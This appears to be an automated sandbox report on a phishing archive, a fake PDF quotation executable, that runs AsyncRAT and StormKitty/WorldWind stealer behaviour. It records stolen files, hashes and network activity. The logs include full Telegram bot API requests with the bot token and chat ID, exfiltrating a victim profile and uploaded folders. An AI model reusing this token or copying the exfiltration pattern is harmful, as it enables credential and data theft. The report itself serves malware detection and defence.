File name:	27052025_0637_26052025_Quotation_Request_-_SM_-_TMBL_-_S05102.pdf.rar
Full analysis:	https://app.any.run/tasks/bbbe6e3d-17be-408d-88ac-5c6af3a00ed0
Verdict:	Malicious activity
Threats:	AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions. Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	May 27, 2025, 06:42:30
OS:	Windows 10 Professional (build: 19044, 64 bit)
Tags:	arch-exec stealer stormkitty evasion telegram worldwind ims-api generic pastebin arch-doc asyncrat rat
Indicators:
MIME:	application/x-rar
File info:	RAR archive data, v5
MD5:	D0309D17522953C9E890B4A14D26C314
SHA1:	91FF528B7C84869EC05203640C3535E0A550F209
SHA256:	ECB7E6CCA4706566C9F7233FA4CE7AFD676EBA459888E0BA05CAA3897225A811
SSDEEP:	24576:SS29/19pDMgoaZYIGCKMdMZnG1NWG/tUhsI/wrT0m+:SS29/TpggoaZYIGCKMdMZnG1NWG/tMsW

.rar	\|	RAR compressed archive (v5.0) (61.5)
.rar	\|	RAR compressed archive (gen) (38.4)

FileVersion:	RAR v5
CompressedSize:	536563
UncompressedSize:	1044992
OperatingSystem:	Win32
ArchivedFileName:	Quotation Request - SM - TMBL - S05102.pdf.exe


(PID) Process:	(7488) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	3
Value: C:\Users\admin\Desktop\preferences.zip
(PID) Process:	(7488) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	2
Value: C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:	(7488) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	1
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:	(7488) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	0
Value: C:\Users\admin\Desktop\27052025_0637_26052025_Quotation_Request_-_SM_-_TMBL_-_S05102.pdf.rar
(PID) Process:	(7488) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	name
Value: 120
(PID) Process:	(7488) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	size
Value: 80
(PID) Process:	(7488) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	type
Value: 120
(PID) Process:	(7488) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	mtime
Value: 100
(PID) Process:	(7488) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList
Operation:	write	Name:	ArcSort
Value: 32
(PID) Process:	(7488) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths
Operation:	write	Name:	name
Value: 256

PID	Process	Filename		Type
7800	Quotation Request - SM - TMBL - S05102.pdf.exe	C:\Users\admin\AppData\Local\Temp\autF7A0.tmp		binary
		MD5:D7ADAEC8709BD75DC5F2F803CCE30146	SHA256:9F267CCB2D23E9F1CC9B6C4F734CA4A921159E5970C2F1839D77E93A2AD494B5
7828	RegSvcs.exe	C:\Users\admin\AppData\Local\eb6ac490e04191317f0bea9d91713320\admin@DESKTOP-JGLLJLD_en-US\Grabber\DRIVE-C\Users\admin\Documents\baycompleted.rtf		text
		MD5:9C3872ADC20D6CE540BBBE3EA719E1A8	SHA256:3CCD781E5125B761941CD5849E6E692B95960B4E367D487D698A90E38909F67A
7828	RegSvcs.exe	C:\Users\admin\AppData\Local\eb6ac490e04191317f0bea9d91713320\admin@DESKTOP-JGLLJLD_en-US\Grabber\DRIVE-C\Users\admin\Documents\desktop.ini		text
		MD5:ECF88F261853FE08D58E2E903220DA14	SHA256:CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
7828	RegSvcs.exe	C:\Users\admin\AppData\Local\eb6ac490e04191317f0bea9d91713320\admin@DESKTOP-JGLLJLD_en-US\Grabber\DRIVE-C\Users\admin\Downloads\humanship.jpg		image
		MD5:011C4C514A636EBB2DD108CC2646ED86	SHA256:2DBBE8D5D30BE33F9D876E437D98B60ACC969780B95619952B8A8AAD28790FB6
7828	RegSvcs.exe	C:\Users\admin\AppData\Local\eb6ac490e04191317f0bea9d91713320\admin@DESKTOP-JGLLJLD_en-US\Grabber\DRIVE-C\Users\admin\Pictures\desktop.ini		text
		MD5:29EAE335B77F438E05594D86A6CA22FF	SHA256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
7828	RegSvcs.exe	C:\Users\admin\AppData\Local\eb6ac490e04191317f0bea9d91713320\admin@DESKTOP-JGLLJLD_en-US\Grabber\DRIVE-C\Users\admin\Pictures\Saved Pictures\desktop.ini		text
		MD5:87A524A2F34307C674DBA10708585A5E	SHA256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
7828	RegSvcs.exe	C:\Users\admin\AppData\Local\eb6ac490e04191317f0bea9d91713320\admin@DESKTOP-JGLLJLD_en-US\Grabber\DRIVE-C\Users\admin\Documents\drivepink.rtf		text
		MD5:9EAD52F9A183F3CFC822BB94EE56654F	SHA256:190D15650F970D6DAEC7A5787A2994E6CF3D810A11757AFEAE72890241147C3A
7828	RegSvcs.exe	C:\Users\admin\AppData\Local\eb6ac490e04191317f0bea9d91713320\admin@DESKTOP-JGLLJLD_en-US\Grabber\DRIVE-C\Users\admin\Pictures\Camera Roll\desktop.ini		text
		MD5:D48FCE44E0F298E5DB52FD5894502727	SHA256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
7828	RegSvcs.exe	C:\Users\admin\AppData\Local\eb6ac490e04191317f0bea9d91713320\admin@DESKTOP-JGLLJLD_en-US\Grabber\DRIVE-C\Users\admin\Downloads\otherscoast.png		image
		MD5:0F4D3649FBBBED1F638BBBFE84599E88	SHA256:07CA0DF8EAB063348769500D40B15C2E214CD99368ADF1A8BA17EC2E16049739
7828	RegSvcs.exe	C:\Users\admin\AppData\Local\eb6ac490e04191317f0bea9d91713320\admin@DESKTOP-JGLLJLD_en-US\Grabber\DRIVE-C\Users\admin\Documents\focusmsn.rtf		text
		MD5:EFDE5CE9AE32431AE1D4A2EB9AEB3972	SHA256:A6D12A2B524296DCE88B21F11E8AA014A1A69C749D962857E04FEC2140C4F607

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
5796	svchost.exe	GET	200	2.20.245.137:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
5776	RUXIMICS.exe	GET	200	2.20.245.137:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
5796	svchost.exe	GET	200	2.23.246.101:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
5776	RUXIMICS.exe	GET	200	2.23.246.101:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
—	—	GET	200	172.67.196.114:443	https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=d4:da:6d:56:32:50	unknown	binary	88 b	—
7828	RegSvcs.exe	GET	200	104.16.185.241:80	http://icanhazip.com/	unknown	—	—	whitelisted
—	—	GET	400	149.154.167.99:443	https://api.telegram.org/bot8087473320:AAGll7iWfDp7yCIbKgAK2k7JvtSdLMvfSL8/sendMessage?chat_id=6779103906&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202025-05-27%206:43:00%20AM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20admin%0ACompName:%20DESKTOP-JGLLJLD%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)%20i5-6400%20CPU%20@%202.70GHz%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%204090MB%0AHWID:%20078BFBFF000506E3%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.100.2%0AInternal%20IP:%20192.168.100.13%0AExternal%20IP:%2051.190.88.103%0ABSSID:%20d4:da:6d:56:32:50%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%202%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2012%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%206%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True	unknown	binary	137 b	whitelisted
—	—	GET	200	149.154.167.99:443	https://api.telegram.org/bot8087473320:AAGll7iWfDp7yCIbKgAK2k7JvtSdLMvfSL8/sendMessage?chat_id=6779103906&text=%F0%9F%93%81%20Uploading%20Log%20Folders...	unknown	binary	286 b	whitelisted
—	—	GET	200	172.67.25.94:443	https://pastebin.com/raw/7B75u64B	unknown	text	46 b	whitelisted
—	—	POST	200	149.154.167.99:443	https://api.telegram.org/bot8087473320:AAGll7iWfDp7yCIbKgAK2k7JvtSdLMvfSL8/sendDocument?chat_id=6779103906	unknown	binary	499 b	whitelisted

PID	Process	IP	Domain	ASN	CN	Reputation
5796	svchost.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted
5776	RUXIMICS.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
—	—	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
5796	svchost.exe	2.20.245.137:80	crl.microsoft.com	Akamai International B.V.	NL	whitelisted
5776	RUXIMICS.exe	2.20.245.137:80	crl.microsoft.com	Akamai International B.V.	NL	whitelisted
5796	svchost.exe	2.23.246.101:80	www.microsoft.com	Ooredoo Q.S.C.	QA	whitelisted
5776	RUXIMICS.exe	2.23.246.101:80	www.microsoft.com	Ooredoo Q.S.C.	QA	whitelisted
7828	RegSvcs.exe	104.16.185.241:80	icanhazip.com	CLOUDFLARENET	—	whitelisted

Domain	IP	Reputation
settings-win.data.microsoft.com	51.104.136.2	whitelisted
google.com	216.58.206.78	whitelisted
crl.microsoft.com	2.20.245.137 2.20.245.139 23.216.77.6 23.216.77.28	whitelisted
www.microsoft.com	2.23.246.101 23.35.229.160	whitelisted
icanhazip.com	104.16.185.241 104.16.184.241	whitelisted
api.mylnikov.org	172.67.196.114 104.21.44.66	unknown
api.telegram.org	149.154.167.220	whitelisted
pastebin.com	104.22.68.199 104.22.69.199 172.67.25.94	whitelisted
officeclient.microsoft.com	52.109.76.240	whitelisted
omex.cdn.office.net	23.48.23.42 23.48.23.11 23.48.23.62 23.48.23.30	whitelisted

PID	Process	Class	Message
7828	RegSvcs.exe	Potential Corporate Privacy Violation	ET INFO Observed Wifi Geolocation Domain (api .mylnikov .org in TLS SNI)
7828	RegSvcs.exe	Attempted Information Leak	ET INFO IP Check Domain (icanhazip. com in HTTP Host)
2196	svchost.exe	Device Retrieving External IP Address Detected	ET INFO External IP Lookup Domain in DNS Lookup (icanhazip .com)
—	—	Potential Corporate Privacy Violation	ET INFO Wifi Geolocation Lookup Attempt
—	—	Potentially Bad Traffic	ET INFO BSSID Location Lookup via api .mylnikov .org
2196	svchost.exe	Misc activity	ET HUNTING Telegram API Domain in DNS Lookup
7828	RegSvcs.exe	Misc activity	ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
7828	RegSvcs.exe	Misc activity	ET HUNTING Telegram API Certificate Observed
—	—	Misc activity	ET HUNTING Telegram API Request (GET)
—	—	Misc activity	ET HUNTING Telegram API Request (GET)

General Info

27052025_0637_26052025_Quotation_Request_-_SM_-_TMBL_-_S05102.pdf.rar

D0309D17522953C9E890B4A14D26C314

91FF528B7C84869EC05203640C3535E0A550F209

ECB7E6CCA4706566C9F7233FA4CE7AFD676EBA459888E0BA05CAA3897225A811

24576:SS29/19pDMgoaZYIGCKMdMZnG1NWG/tUhsI/wrT0m+:SS29/TpggoaZYIGCKMdMZnG1NWG/tMsW

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Actions looks like stealing of personal data

STORMKITTY has been detected (YARA)

Steals credentials from Web Browsers

ASYNCRAT has been detected (MUTEX)

SUSPICIOUS

Write to the desktop.ini file (may be used to cloak folders)

Starts application with an unusual extension

Using 'findstr.exe' to search for text patterns in files and output

Starts CMD.EXE for commands execution

Uses NETSH.EXE to obtain data on the network

Possible usage of Discord/Telegram API has been detected (YARA)

Process communicates with Telegram (possibly using it as an attacker's C2 server)

Checks for external IP

Potential Corporate Privacy Violation

INFO

Manual execution by a user

Reads mouse settings

The sample compiled with english language support

Checks supported languages

Reads the machine GUID from the registry

Reads the computer name

Create files in a temporary directory

Creates files or folders in the user directory

Changes the display of characters in the console

Checks proxy server information

Disables trace logs

Reads the software policy settings

Reads security settings of Internet Explorer

Reads CPU info

Malware configuration

Static information

TRiD

EXIF

ZIP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats